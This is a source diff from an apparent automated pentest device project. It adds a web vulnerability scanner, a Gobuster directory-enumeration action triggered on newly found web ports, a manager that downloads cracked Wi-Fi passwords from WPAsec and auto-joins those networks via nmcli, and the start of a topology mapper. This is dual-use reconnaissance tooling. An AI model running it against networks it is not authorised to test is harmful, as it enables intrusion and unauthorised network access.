||||
def analyze_forms(self, url, response):
|
||||
"""Analyze HTML forms for potential vulnerabilities."""
|
||||
try:
|
||||
soup = BeautifulSoup(response.text, 'html.parser')
|
||||
forms = soup.find_all('form')
|
||||
|
||||
for form in forms:
|
||||
form_data = {
|
||||
'url': url,
|
||||
'method': form.get('method', 'get').lower(),
|
||||
'action': urljoin(url, form.get('action', '')),
|
||||
'inputs': [],
|
||||
'timestamp': datetime.now().isoformat()
|
||||
}
|
||||
|
||||
# Analyze form inputs
|
||||
for input_field in form.find_all(['input', 'textarea']):
|
||||
input_data = {
|
||||
'type': input_field.get('type', 'text'),
|
||||
'name': input_field.get('name', ''),
|
||||
'id': input_field.get('id', ''),
|
||||
'required': input_field.get('required') is not None
|
||||
}
|
||||
form_data['inputs'].append(input_data)
|
||||
|
||||
with self.lock:
|
||||
self.forms.append(form_data)
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error analyzing forms in {url}: {e}")
|
||||
|
||||
def check_security_headers(self, url, response):
|
||||
"""Check for missing or misconfigured security headers."""
|
||||
security_headers = {
|
||||
'X-Frame-Options': 'Missing X-Frame-Options header',
|
||||
'X-XSS-Protection': 'Missing X-XSS-Protection header',
|
||||
'X-Content-Type-Options': 'Missing X-Content-Type-Options header',
|
||||
'Strict-Transport-Security': 'Missing HSTS header',
|
||||
'Content-Security-Policy': 'Missing Content-Security-Policy'
|
||||
}
|
||||
|
||||
for header, message in security_headers.items():
|
||||
if header not in response.headers:
|
||||
with self.lock:
|
||||
self.vulnerabilities.append({
|
||||
'type': 'missing_security_header',
|
||||
'url': url,
|
||||
'detail': message,
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
|
||||
def check_information_disclosure(self, url, response):
|
||||
"""Check for information disclosure in response."""
|
||||
patterns = {
|
||||
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
|
||||
            'internal_ip': r'\b(?:192\.168|10\.\d{1,3}|172\.(?:1[6-9]|2[0-9]|3[01]))\.\d{1,3}\.\d{1,3}\b',
|
||||
'debug_info': r'(?:stack trace|debug|error|exception)',
|
||||
'version_info': r'(?:version|powered by|built with)'
|
||||
}
|
||||
|
||||
content = response.text.lower()
|
||||
for info_type, pattern in patterns.items():
|
||||
matches = re.findall(pattern, content, re.IGNORECASE)
|
||||
if matches:
|
||||
with self.lock:
|
||||
self.vulnerabilities.append({
|
||||
'type': 'information_disclosure',
|
||||
'url': url,
|
||||
'info_type': info_type,
|
||||
'findings': matches,
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
|
||||
def save_results(self):
|
||||
"""Save scan results to JSON files."""
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
|
||||
# Save discovered paths
|
||||
if self.discovered_paths:
|
||||
paths_file = os.path.join(self.output_dir, f"paths_{timestamp}.json")
|
||||
with open(paths_file, 'w') as f:
|
||||
json.dump(list(self.discovered_paths), f, indent=4)
|
||||
|
||||
# Save vulnerabilities
|
||||
if self.vulnerabilities:
|
||||
vulns_file = os.path.join(self.output_dir, f"vulnerabilities_{timestamp}.json")
|
||||
with open(vulns_file, 'w') as f:
|
||||
json.dump(self.vulnerabilities, f, indent=4)
|
||||
|
||||
# Save form analysis
|
||||
if self.forms:
|
||||
forms_file = os.path.join(self.output_dir, f"forms_{timestamp}.json")
|
||||
with open(forms_file, 'w') as f:
|
||||
json.dump(self.forms, f, indent=4)
|
||||
|
||||
logging.info(f"Results saved to {self.output_dir}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save results: {e}")
|
||||
|
||||
def execute(self):
|
||||
"""Execute the web application scan."""
|
||||
try:
|
||||
logging.info(f"Starting web scan on {self.base_url}")
|
||||
paths = self.load_wordlist()
|
||||
|
||||
with ThreadPoolExecutor(max_workers=self.threads) as executor:
|
||||
executor.map(self.scan_path, paths)
|
||||
|
||||
self.save_results()
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Scan error: {e}")
|
||||
finally:
|
||||
self.session.close()
|
||||
|
||||
def save_settings(url, wordlist, output_dir, threads, delay):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"url": url,
|
||||
"wordlist": wordlist,
|
||||
"output_dir": output_dir,
|
||||
"threads": threads,
|
||||
"delay": delay
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Web application vulnerability scanner")
|
||||
parser.add_argument("-u", "--url", help="Target URL to scan")
|
||||
parser.add_argument("-w", "--wordlist", help="Path to directory wordlist")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
|
||||
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
|
||||
parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
url = args.url or settings.get("url")
|
||||
wordlist = args.wordlist or settings.get("wordlist")
|
||||
    # CLI value -> saved setting -> built-in default (argparse defaults of None
    # keep saved settings reachable, matching the header's stated behavior).
    output_dir = args.output or settings.get("output_dir") or DEFAULT_OUTPUT_DIR
    threads = args.threads or settings.get("threads") or 10
    delay = args.delay if args.delay is not None else settings.get("delay", 0.1)
|
||||
|
||||
if not url:
|
||||
logging.error("URL is required. Use -u or save it in settings")
|
||||
return
|
||||
|
||||
save_settings(url, wordlist, output_dir, threads, delay)
|
||||
|
||||
    scanner = ValkyrieScout(
|
||||
url=url,
|
||||
wordlist=wordlist,
|
||||
output_dir=output_dir,
|
||||
threads=threads,
|
||||
delay=delay
|
||||
)
|
||||
scanner.execute()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
297
resources/default_config/actions/web_enum.py
Normal file
@@ -0,0 +1,297 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
|
||||
|
||||
- Writes each finding into the `webenum` table
|
||||
- ON CONFLICT(mac_address, ip, port, directory) DO UPDATE
|
||||
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit)
|
||||
- No filesystem output: parse Gobuster stdout directly
|
||||
"""
|
||||
|
||||
import os
import re
|
||||
import socket
|
||||
import subprocess
|
||||
import threading
|
||||
import logging
|
||||
from typing import List, Dict, Tuple, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
# -------------------- Logger & module meta --------------------
|
||||
logger = Logger(name="web_enum.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "WebEnumeration"
|
||||
b_module = "web_enum"
|
||||
b_status = "WebEnumeration"
|
||||
b_port = 80
|
||||
b_service = '["http","https"]'
|
||||
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
|
||||
b_parent = None
|
||||
b_priority = 90 # adjust if needed
|
||||
b_cooldown = 1800 # 30 minutes between runs
|
||||
b_rate_limit = '3/86400' # 3 times per day max
|
||||
b_enabled = 0
|
||||
|
||||
# -------------------- Status parsing helpers --------------------
|
||||
VALID_STATUS_CODES = {
|
||||
200: "OK", 201: "Created", 204: "No Content",
|
||||
301: "Moved Permanently", 302: "Found (Temp Redirect)",
|
||||
303: "See Other", 307: "Temporary Redirect", 308: "Permanent Redirect",
|
||||
401: "Unauthorized", 403: "Forbidden", 405: "Method Not Allowed"
|
||||
}
|
||||
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
|
||||
CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
|
||||
|
||||
# Gobuster "dir" line examples handled:
|
||||
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
|
||||
# /images (Status: 200) [Size: 12345]
|
||||
GOBUSTER_LINE = re.compile(
|
||||
r"""^(?P<path>\S+)\s*
|
||||
\(Status:\s*(?P<status>\d{3})\)\s*
|
||||
(?:\[Size:\s*(?P<size>\d+)\])?
|
||||
(?:\s*\[\-\-\>\s*(?P<redir>[^\]]+)\])?
|
||||
""",
|
||||
re.VERBOSE
|
||||
)
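# Illustrative parse of the first sample line above:
#
#   m = GOBUSTER_LINE.match("/admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]")
#   # m.group("path")   == "/admin"
#   # m.group("status") == "301"
#   # m.group("size")   == "310"
#   # m.group("redir")  == "http://10.0.0.5/admin/"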
|
||||
|
||||
|
||||
class WebEnumeration:
|
||||
"""
|
||||
Orchestrates Gobuster web dir enum and writes normalized results into DB.
|
||||
In-memory only: no CSV, no temp files.
|
||||
"""
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
|
||||
self.wordlist = self.shared_data.common_wordlist
|
||||
self.lock = threading.Lock()
|
||||
|
||||
# ---- Sanity checks
|
||||
|
||||
if not os.path.exists(self.gobuster_path):
|
||||
raise FileNotFoundError(f"Gobuster not found at {self.gobuster_path}")
|
||||
if not os.path.exists(self.wordlist):
|
||||
raise FileNotFoundError(f"Wordlist not found: {self.wordlist}")
|
||||
|
||||
logger.info("WebEnumeration initialized (stdout mode, no files).")
|
||||
|
||||
# -------------------- Utilities --------------------
|
||||
def _scheme_for_port(self, port: int) -> str:
|
||||
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
|
||||
return "https" if int(port) in https_ports else "http"
|
||||
|
||||
|
||||
def _reverse_dns(self, ip: str) -> Optional[str]:
|
||||
try:
|
||||
name, _, _ = socket.gethostbyaddr(ip)
|
||||
return name
|
||||
except Exception:
|
||||
return None
|
||||
|
||||
def _extract_identity(self, row: Dict) -> Tuple[str, Optional[str]]:
|
||||
"""Return (mac_address, hostname) from a row with tolerant keys."""
|
||||
mac = row.get("mac_address") or row.get("mac") or row.get("MAC") or ""
|
||||
hostname = row.get("hostname") or row.get("Hostname") or None
|
||||
return str(mac), (str(hostname) if hostname else None)
|
||||
|
||||
# -------------------- DB Writer --------------------
|
||||
def _db_add_result(self,
|
||||
mac_address: str,
|
||||
ip: str,
|
||||
hostname: Optional[str],
|
||||
port: int,
|
||||
directory: str,
|
||||
status: int,
|
||||
size: int = 0,
|
||||
response_time: int = 0,
|
||||
content_type: Optional[str] = None,
|
||||
tool: str = "gobuster") -> None:
|
||||
"""Upsert a single record into `webenum`."""
|
||||
try:
|
||||
self.shared_data.db.execute("""
|
||||
INSERT INTO webenum (
|
||||
mac_address, ip, hostname, port, directory, status,
|
||||
size, response_time, content_type, tool, is_active
|
||||
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 1)
|
||||
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
|
||||
status = excluded.status,
|
||||
size = excluded.size,
|
||||
response_time = excluded.response_time,
|
||||
content_type = excluded.content_type,
|
||||
hostname = COALESCE(excluded.hostname, webenum.hostname),
|
||||
tool = COALESCE(excluded.tool, webenum.tool),
|
||||
last_seen = CURRENT_TIMESTAMP,
|
||||
is_active = 1
|
||||
""", (mac_address, ip, hostname, int(port), directory, int(status),
|
||||
int(size or 0), int(response_time or 0), content_type, tool))
|
||||
logger.debug(f"DB upsert: {ip}:{port}{directory} -> {status} (size={size})")
|
||||
except Exception as e:
|
||||
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
|
||||
|
||||
# -------------------- Gobuster runner (stdout) --------------------
|
||||
def _run_gobuster_stdout(self, url: str) -> Optional[str]:
|
||||
base_cmd = [
|
||||
self.gobuster_path, "dir",
|
||||
"-u", url,
|
||||
"-w", self.wordlist,
|
||||
"-t", "10",
|
||||
"--quiet",
|
||||
"--no-color",
|
||||
]
|
||||
|
||||
def run(cmd):
|
||||
return subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
|
||||
|
||||
# Try with -z first
|
||||
cmd = base_cmd + ["-z"]
|
||||
logger.info(f"Running Gobuster on {url}...")
|
||||
try:
|
||||
res = run(cmd)
|
||||
if res.returncode == 0:
|
||||
logger.success(f"Gobuster OK on {url}")
|
||||
return res.stdout or ""
|
||||
# Fallback if -z is unknown
|
||||
if "unknown flag" in (res.stderr or "").lower() or "invalid" in (res.stderr or "").lower():
|
||||
logger.info("Gobuster doesn't support -z, retrying without it.")
|
||||
res2 = run(base_cmd)
|
||||
if res2.returncode == 0:
|
||||
logger.success(f"Gobuster OK on {url} (no -z)")
|
||||
return res2.stdout or ""
|
||||
logger.info(f"Gobuster failed on {url}: {res2.stderr.strip()}")
|
||||
return None
|
||||
logger.info(f"Gobuster failed on {url}: {res.stderr.strip()}")
|
||||
return None
|
||||
except Exception as e:
|
||||
logger.error(f"Gobuster exception on {url}: {e}")
|
||||
return None
|
||||
|
||||
|
||||
def _parse_gobuster_text(self, text: str) -> List[Dict]:
|
||||
"""
|
||||
Parse gobuster stdout lines into entries:
|
||||
{ 'path': '/admin', 'status': 301, 'size': 310, 'redirect': 'http://...'|None }
|
||||
"""
|
||||
entries: List[Dict] = []
|
||||
if not text:
|
||||
return entries
|
||||
|
||||
for raw in text.splitlines():
|
||||
# 1) strip ANSI/control BEFORE regex
|
||||
line = ANSI_RE.sub("", raw)
|
||||
line = CTL_RE.sub("", line)
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
|
||||
m = GOBUSTER_LINE.match(line)
|
||||
if not m:
|
||||
logger.debug(f"Unparsed line: {line}")
|
||||
continue
|
||||
|
||||
# 2) extract all fields NOW
|
||||
path = m.group("path") or ""
|
||||
status = int(m.group("status"))
|
||||
size = int(m.group("size") or 0)
|
||||
redir = m.group("redir")
|
||||
|
||||
# 3) normalize path
|
||||
if not path.startswith("/"):
|
||||
path = "/" + path
|
||||
path = "/" + path.strip("/")
|
||||
|
||||
entries.append({
|
||||
"path": path,
|
||||
"status": status,
|
||||
"size": size,
|
||||
"redirect": redir.strip() if redir else None
|
||||
})
|
||||
|
||||
logger.info(f"Parsed {len(entries)} entries from gobuster stdout")
|
||||
return entries
|
||||
|
||||
# -------------------- Public API --------------------
|
||||
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
|
||||
"""
|
||||
Run gobuster on (ip,port), parse stdout, upsert each finding into DB.
|
||||
Returns: 'success' | 'failed' | 'interrupted'
|
||||
"""
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Interrupted before start (orchestrator flag).")
|
||||
return "interrupted"
|
||||
|
||||
scheme = self._scheme_for_port(port)
|
||||
base_url = f"{scheme}://{ip}:{port}"
|
||||
logger.info(f"Enumerating {base_url} ...")
|
||||
            self.shared_data.bjorn_orch_status = b_class  # same attribute name as the other refactored actions
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Interrupted before gobuster run.")
|
||||
return "interrupted"
|
||||
|
||||
stdout_text = self._run_gobuster_stdout(base_url)
|
||||
if stdout_text is None:
|
||||
return "failed"
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Interrupted after gobuster run (stdout captured).")
|
||||
return "interrupted"
|
||||
|
||||
entries = self._parse_gobuster_text(stdout_text)
|
||||
if not entries:
|
||||
logger.warning(f"No entries for {base_url}.")
|
||||
return "success" # scan ran fine but no findings
|
||||
|
||||
mac_address, hostname = self._extract_identity(row)
|
||||
if not hostname:
|
||||
hostname = self._reverse_dns(ip)
|
||||
|
||||
for e in entries:
|
||||
self._db_add_result(
|
||||
mac_address=mac_address,
|
||||
ip=ip,
|
||||
hostname=hostname,
|
||||
port=port,
|
||||
directory=e["path"],
|
||||
status=e["status"],
|
||||
size=e.get("size", 0),
|
||||
response_time=0, # gobuster doesn't expose timing here
|
||||
content_type=None, # unknown here; a later HEAD/GET probe can fill it
|
||||
tool="gobuster"
|
||||
)
|
||||
|
||||
return "success"
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Execute error on {ip}:{port}: {e}")
|
||||
return "failed"
|
||||
|
||||
|
||||
# -------------------- CLI mode (debug/manual) --------------------
if __name__ == "__main__":
    shared_data = SharedData()
    try:
        web_enum = WebEnumeration(shared_data)
        logger.info("Starting web directory enumeration...")

        rows = shared_data.read_data()
        for row in rows:
            ip = row.get("IPs") or row.get("ip")
            if not ip:
                continue
            port = row.get("port") or 80
            logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
            status = web_enum.execute(ip, int(port), row, "enum_web_directories")
            if status == "success":
                logger.success(f"Enumeration successful for {ip}:{port}.")
            elif status == "interrupted":
                logger.warning(f"Enumeration interrupted for {ip}:{port}.")
                break
            else:
                logger.failed(f"Enumeration failed for {ip}:{port}.")

        logger.info("Web directory enumeration completed.")
    except Exception as e:
        logger.error(f"General execution error: {e}")
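
# Hedged sketch (illustration only, not part of this action): findings above are
# stored with content_type=None; a later HEAD probe could backfill it. The helper
# name below is an assumption, not an existing project API.
import requests


def probe_content_type(url: str, timeout: float = 3.0):
    """Return the Content-Type of `url` via a HEAD request, or None on error."""
    try:
        resp = requests.head(url, timeout=timeout, allow_redirects=True)
        return resp.headers.get("Content-Type")
    except requests.RequestException:
        return None

# Usage (hypothetical): probe_content_type("http://10.0.0.5:80/admin")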
317
resources/default_config/actions/wpasec_potfiles.py
Normal file
@@ -0,0 +1,317 @@
# wpasec_potfiles.py
# WPAsec Potfile Manager - Download, clean, import, or erase Wi-Fi credentials

import os
import json
import glob
import argparse
import requests
import subprocess
from datetime import datetime
import logging

# ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
b_class = "WPAsecPotfileManager"
b_module = "wpasec_potfiles"
b_enabled = 1
b_action = "normal"  # normal | aggressive | stealth
b_category = "wifi"
b_name = "WPAsec Potfile Manager"
b_description = (
    "Download, clean, import, or erase Wi-Fi networks from WPAsec potfiles. "
    "Options: download (default if API key is set), clean, import, erase."
)
b_author = "Fabien / Cyberviking"
b_version = "1.0.0"
b_icon = f"/actions_icons/{b_class}.png"
b_docs_url = "https://wpa-sec.stanev.org/?api"

b_args = {
    "key": {
        "type": "text",
        "label": "API key (WPAsec)",
        "placeholder": "wpa-sec api key",
        "secret": True,
        "help": "API key used to download the potfile. If empty, the saved key is reused."
    },
    "directory": {
        "type": "text",
        "label": "Potfiles directory",
        "default": "/home/bjorn/Bjorn/data/input/potfiles",
        "placeholder": "/path/to/potfiles",
        "help": "Directory containing/receiving .pot / .potfile files."
    },
    "clean": {
        "type": "checkbox",
        "label": "Clean potfiles directory",
        "default": False,
        "help": "Delete all files in the potfiles directory."
    },
    "import_potfiles": {
        "type": "checkbox",
        "label": "Import potfiles into NetworkManager",
        "default": False,
        "help": "Add Wi-Fi networks found in potfiles via nmcli (avoiding duplicates)."
    },
    "erase": {
        "type": "checkbox",
        "label": "Erase Wi-Fi connections from potfiles",
        "default": False,
        "help": "Delete via nmcli the Wi-Fi networks listed in potfiles (avoiding duplicates)."
    }
}

b_examples = [
    {"directory": "/home/bjorn/Bjorn/data/input/potfiles"},
    {"key": "YOUR_API_KEY_HERE", "directory": "/home/bjorn/Bjorn/data/input/potfiles"},
    {"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True},
    {"directory": "/home/bjorn/Bjorn/data/input/potfiles", "import_potfiles": True},
    {"directory": "/home/bjorn/Bjorn/data/input/potfiles", "erase": True},
    {"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True, "import_potfiles": True},
]


def compute_dynamic_b_args(base: dict) -> dict:
    """
    Enrich dynamic UI arguments:
    - Pre-fill the API key if previously saved.
    - Show info about the number of potfiles in the chosen directory.
    """
    d = dict(base or {})
    try:
        settings_path = os.path.join(
            os.path.expanduser("~"), ".settings_bjorn", "wpasec_settings.json"
        )
        if os.path.exists(settings_path):
            with open(settings_path, "r", encoding="utf-8") as f:
                saved = json.load(f)
            saved_key = (saved or {}).get("api_key")
            if saved_key and not d.get("key", {}).get("default"):
                d.setdefault("key", {}).setdefault("default", saved_key)
                d["key"]["help"] = (d["key"].get("help") or "") + " (auto-detected)"
    except Exception:
        pass

    try:
        directory = d.get("directory", {}).get("default") or "/home/bjorn/Bjorn/data/input/potfiles"
        exists = os.path.isdir(directory)
        count = 0
        if exists:
            count = len(glob.glob(os.path.join(directory, "*.pot"))) + \
                    len(glob.glob(os.path.join(directory, "*.potfile")))
        extra = f" | Found: {count} potfile(s)" if exists else " | (directory does not exist yet)"
        d["directory"]["help"] = (d["directory"].get("help") or "") + extra
    except Exception:
        pass

    return d

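# Usage sketch (illustrative; the exact launcher call is an assumption):
#   ui_args = compute_dynamic_b_args(b_args)
#   ui_args["directory"]["help"]   # e.g. "... | Found: 3 potfile(s)"
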
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
class WPAsecPotfileManager:
    DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
    DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
    SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
    DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"

    def __init__(self, shared_data):
        """
        The orchestrator always passes shared_data.
        Even if unused here, it is stored for compatibility.
        """
        self.shared_data = shared_data
        logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")

    # --- Orchestrator entry point ---
    def execute(self, ip=None, port=None, row=None, status_key=None):
        """
        Entry point for the orchestrator.
        By default: download the latest potfile if an API key is available.
        """
        self.shared_data.bjornorch_status = "WPAsecPotfileManager"
        self.shared_data.comment_params = {"ip": ip, "port": port}

        api_key = self.load_api_key()
        if api_key:
            logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
            self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
            return "success"
        else:
            logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
            return "failed"

    # --- API Key Handling ---
    def save_api_key(self, api_key: str):
        """Save the API key locally."""
        try:
            os.makedirs(self.DEFAULT_SETTINGS_DIR, exist_ok=True)
            settings = {"api_key": api_key}
            with open(self.SETTINGS_FILE, "w") as file:
                json.dump(settings, file)
            logging.info(f"API key saved to {self.SETTINGS_FILE}")
        except Exception as e:
            logging.error(f"Failed to save API key: {e}")

    def load_api_key(self):
        """Load the API key from local storage."""
        if os.path.exists(self.SETTINGS_FILE):
            try:
                with open(self.SETTINGS_FILE, "r") as file:
                    settings = json.load(file)
                return settings.get("api_key")
            except Exception as e:
                logging.error(f"Failed to load API key: {e}")
        return None

    # --- Actions ---
    def download_potfile(self, save_dir, api_key):
        """Download the potfile from WPAsec."""
        try:
            cookies = {"key": api_key}
            logging.info(f"Downloading potfile from: {self.DOWNLOAD_URL}")
            response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
            response.raise_for_status()

            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
            filename = os.path.join(save_dir, f"potfile_{timestamp}.pot")

            os.makedirs(save_dir, exist_ok=True)
            with open(filename, "wb") as file:
                for chunk in response.iter_content(chunk_size=8192):
                    file.write(chunk)

            logging.info(f"Potfile saved to: {filename}")
        except requests.exceptions.RequestException as e:
            logging.error(f"Failed to download potfile: {e}")
        except Exception as e:
            logging.error(f"Unexpected error: {e}")

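    # Equivalent manual download (hedged sketch of the same cookie-auth request):
    #   curl --cookie "key=<API_KEY>" -o potfile.pot "https://wpa-sec.stanev.org/?api&dl=1"
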
    def clean_directory(self, directory):
        """Delete all potfiles in the given directory."""
        try:
            if os.path.exists(directory):
                logging.info(f"Cleaning directory: {directory}")
                for file in os.listdir(directory):
                    file_path = os.path.join(directory, file)
                    if os.path.isfile(file_path):
                        os.remove(file_path)
                        logging.info(f"Deleted: {file_path}")
            else:
                logging.info(f"Directory does not exist: {directory}")
        except Exception as e:
            logging.error(f"Failed to clean directory {directory}: {e}")

    def import_potfiles(self, directory):
        """Import potfiles into NetworkManager using nmcli."""
        try:
            potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
            processed_ssids = set()
            networks_added = []
            DEFAULT_PRIORITY = 5

            for path in potfile_paths:
                with open(path, "r") as potfile:
                    for line in potfile:
                        line = line.strip()
                        if ":" not in line:
                            continue
                        ssid, password = self._parse_potfile_line(line)
                        if not ssid or not password or ssid in processed_ssids:
                            continue

                        try:
                            subprocess.run(
                                ["sudo", "nmcli", "connection", "add", "type", "wifi",
                                 "con-name", ssid, "ifname", "*", "ssid", ssid,
                                 "wifi-sec.key-mgmt", "wpa-psk", "wifi-sec.psk", password,
                                 "connection.autoconnect", "yes",
                                 "connection.autoconnect-priority", str(DEFAULT_PRIORITY)],
                                check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
                            )
                            processed_ssids.add(ssid)
                            networks_added.append(ssid)
                            logging.info(f"Imported network {ssid}")
                        except subprocess.CalledProcessError as e:
                            logging.error(f"Failed to import {ssid}: {e.stderr.strip()}")

            logging.info(f"Total imported: {networks_added}")
        except Exception as e:
            logging.error(f"Unexpected error while importing: {e}")

    def erase_networks(self, directory):
        """Erase Wi-Fi connections listed in potfiles using nmcli."""
        try:
            potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
            processed_ssids = set()
            networks_removed = []

            for path in potfile_paths:
                with open(path, "r") as potfile:
                    for line in potfile:
                        line = line.strip()
                        if ":" not in line:
                            continue
                        ssid, _ = self._parse_potfile_line(line)
                        if not ssid or ssid in processed_ssids:
                            continue

                        try:
                            subprocess.run(
                                ["sudo", "nmcli", "connection", "delete", "id", ssid],
                                check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
                            )
                            processed_ssids.add(ssid)
                            networks_removed.append(ssid)
                            logging.info(f"Deleted network {ssid}")
                        except subprocess.CalledProcessError as e:
                            logging.warning(f"Failed to delete {ssid}: {e.stderr.strip()}")

            logging.info(f"Total deleted: {networks_removed}")
        except Exception as e:
            logging.error(f"Unexpected error while erasing: {e}")

    # --- Helpers ---
    def _parse_potfile_line(self, line: str):
        """Parse a potfile line into (ssid, password)."""
        ssid, password = None, None
        if line.startswith("$WPAPSK$") and "#" in line:
            try:
                ssid_hash, password = line.split(":", 1)
                ssid = ssid_hash.split("#")[0].replace("$WPAPSK$", "")
            except ValueError:
                return None, None
        elif len(line.split(":")) == 4:
            try:
                _, _, ssid, password = line.split(":")
            except ValueError:
                return None, None
        return ssid, password

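    # Illustrative examples (hypothetical values) for both formats above:
    #   _parse_potfile_line("$WPAPSK$HomeNet#1a2b3c:secretpass")
    #       -> ("HomeNet", "secretpass")   # hashcat $WPAPSK$ style
    #   _parse_potfile_line("a1b2c3d4e5f6:112233445566:HomeNet:secretpass")
    #       -> ("HomeNet", "secretpass")   # wpa-sec 4-field style
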
    # --- CLI ---
    def run(self, argv=None):
        parser = argparse.ArgumentParser(description="Manage WPAsec potfiles (download, clean, import, erase).")
        parser.add_argument("-k", "--key", help="API key for WPAsec (saved locally after first use).")
        parser.add_argument("-d", "--directory", default=self.DEFAULT_SAVE_DIR, help="Directory for potfiles.")
        parser.add_argument("-c", "--clean", action="store_true", help="Clean the potfiles directory.")
        parser.add_argument("-a", "--import-potfiles", action="store_true", help="Import potfiles into NetworkManager.")
        parser.add_argument("-e", "--erase", action="store_true", help="Erase Wi-Fi connections from potfiles.")
        args = parser.parse_args(argv)

        api_key = args.key
        if api_key:
            self.save_api_key(api_key)
        else:
            api_key = self.load_api_key()

        if args.clean:
            self.clean_directory(args.directory)
        if args.import_potfiles:
            self.import_potfiles(args.directory)
        if args.erase:
            self.erase_networks(args.directory)
        if api_key and not args.clean and not args.import_potfiles and not args.erase:
            self.download_potfile(args.directory, api_key)


if __name__ == "__main__":
    WPAsecPotfileManager(shared_data=None).run()
335
resources/default_config/actions/yggdrasil_mapper.py
Normal file
@@ -0,0 +1,335 @@
# Network topology mapping tool for discovering and visualizing network segments.
# Saves settings in `/home/bjorn/.settings_bjorn/yggdrasil_mapper_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -r, --range Network range to scan (CIDR format).
# -i, --interface Network interface to use (default: active interface).
# -d, --depth Maximum trace depth for routing (default: 5).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/topology).
# -t, --timeout Timeout for probes in seconds (default: 2).

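# Example invocation (hypothetical values; scapy raw sockets require root):
#   sudo python3 yggdrasil_mapper.py -r 192.168.1.0/24 -i eth0 -d 8 -t 3
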
import os
import json
import argparse
from datetime import datetime
import logging
import subprocess
import networkx as nx
import matplotlib.pyplot as plt
import nmap
import scapy.all as scapy
from scapy.layers.inet import IP, ICMP, TCP
import threading
import queue


b_class = "YggdrasilMapper"
b_module = "yggdrasil_mapper"
b_enabled = 0

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

# Default settings
